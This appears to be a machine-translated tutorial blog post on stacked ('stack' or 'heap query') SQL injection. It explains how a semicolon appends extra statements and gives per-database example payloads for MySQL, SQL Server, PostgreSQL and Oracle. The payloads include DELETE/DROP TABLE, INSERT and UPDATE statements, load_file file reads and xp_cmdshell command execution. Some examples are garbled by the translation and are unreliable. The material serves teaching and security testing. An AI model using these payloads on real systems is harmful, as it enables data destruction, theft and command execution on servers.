Stacked injection--Stack Injection--heap query injection
The original address; http://www.sqlinjection.net/stacked-queries/This article belongs to the collection of the original author's ideas and personal thoughts combined with a product. Stacked injection Chinese translation came, some of the domestic called Heap query injection, also known as stack injection. Personally, it's more accurate to call it stack injection. Stack injection provides attackers with a number of ways to attack, by adding a new query or terminating a query, to modify the data and invoke the stored procedure. This technique is still more frequent in SQL injection.
Introduction to the principle of 0x01
In SQL, a semicolon (;) is used to represent the end of an SQL statement. Think of us in; After ending an SQL statement, continue to construct the next statement, will it be executed together? So the idea is to create a stack injection. and union injection (joint injection) is also the combination of two statements, what is the difference between the two? The difference is that the type of statement that the Union or union all executes is limited and can be used to execute a query statement, while a stack injection can execute arbitrary statements. For example, the following example. User input: 1; DELETE from the products server-side generated SQL statement is: (because the input parameters are not filtered) Select * from the products where productid=1;delete from products when the query is executed, The first one displays the query information, and the second deletes the entire table.
Limitations of 0x02 Stacking injection
The limitation of stack injection is that not every environment can be executed, may be limited by the API or the database engine is not supported, of course, insufficient permissions can also explain why the attacker could not modify the data or invoke some programs.
Ps: This image is intercepted from the original text, because my personal test environment is php+mysql, can be executed, there is doubt about mysql/php. But the individual estimates the original author may have different reasons for my version. Although we mentioned earlier that a stack query can execute arbitrary SQL statements, this injection is not perfect. In our web system, because the code usually returns only one query result, the second statement of the stack injection produces an error or the result can only be ignored, and we cannot see the return result on the front-end interface. Therefore, when reading data, we recommend the use of Union (Union) injection. We also need to know some database related information such as table name, column name and so on before using stack injection.
0X03 Individual Database Instance Introduction
In this section, we describe the usage of several types of databases from a common database perspective. The basic operation of the database, adding and removing check and change. The basic operations for database-related stack injection are listed below.
- One. Mysql
(1) Create a new table select * from the Users where Id=1;create table test like users;
Successful execution, let's see if we can create a new success table.
- 2. Delete the new test table above select * from users where id=1;drop table test;
- 3. Querying data Select * from users where id=1;select;
Load File select * from Users where Id=1;select load_file (' c:/tmpupbbn.php ');
- 4. Modify Data select * from the users where Id=1;insert into users (Id,username,password)
VALUES (' + ', ' new ', ' new ');
- Two. SQL Server
- 1. Add Datasheet select * from Test;create table SC3 (SS CHAR (8));
- 2. Delete Data Sheet SELECT * from Test;drop table sc3;
(3) query data Select 1,2,3;select * from test;
- 4. Modify Data Select * FROM Test;update Test set name= ' test ' where id=3;
- 5. Execution of the most important stored procedures in SQL Server
SELECT * FROM Test where id=1;exec master: xp_cmdshell ' ipconfig '
- Three. Oracle
As we have mentioned in the above introduction, Oracle cannot use stack injection and can see that when there are two statements on the same line, an error is made directly. Invalid character. The back will not go down to try.
- Four. Postgresql
- 1. Create a new Table select * FROM User_test;create table User_data (id DATE);
You can see that the User_data table has been built.
- 2. Delete the new user_data table above select * from User_test;delete from User_data;
- 3. Query data select * from User_test;select;
- 4. Modify Data Select * FROM User_test;update user_test set name= ' modify ' where Name= ' Zhang San ';
Stacked injection--Stack Injection--heap query injection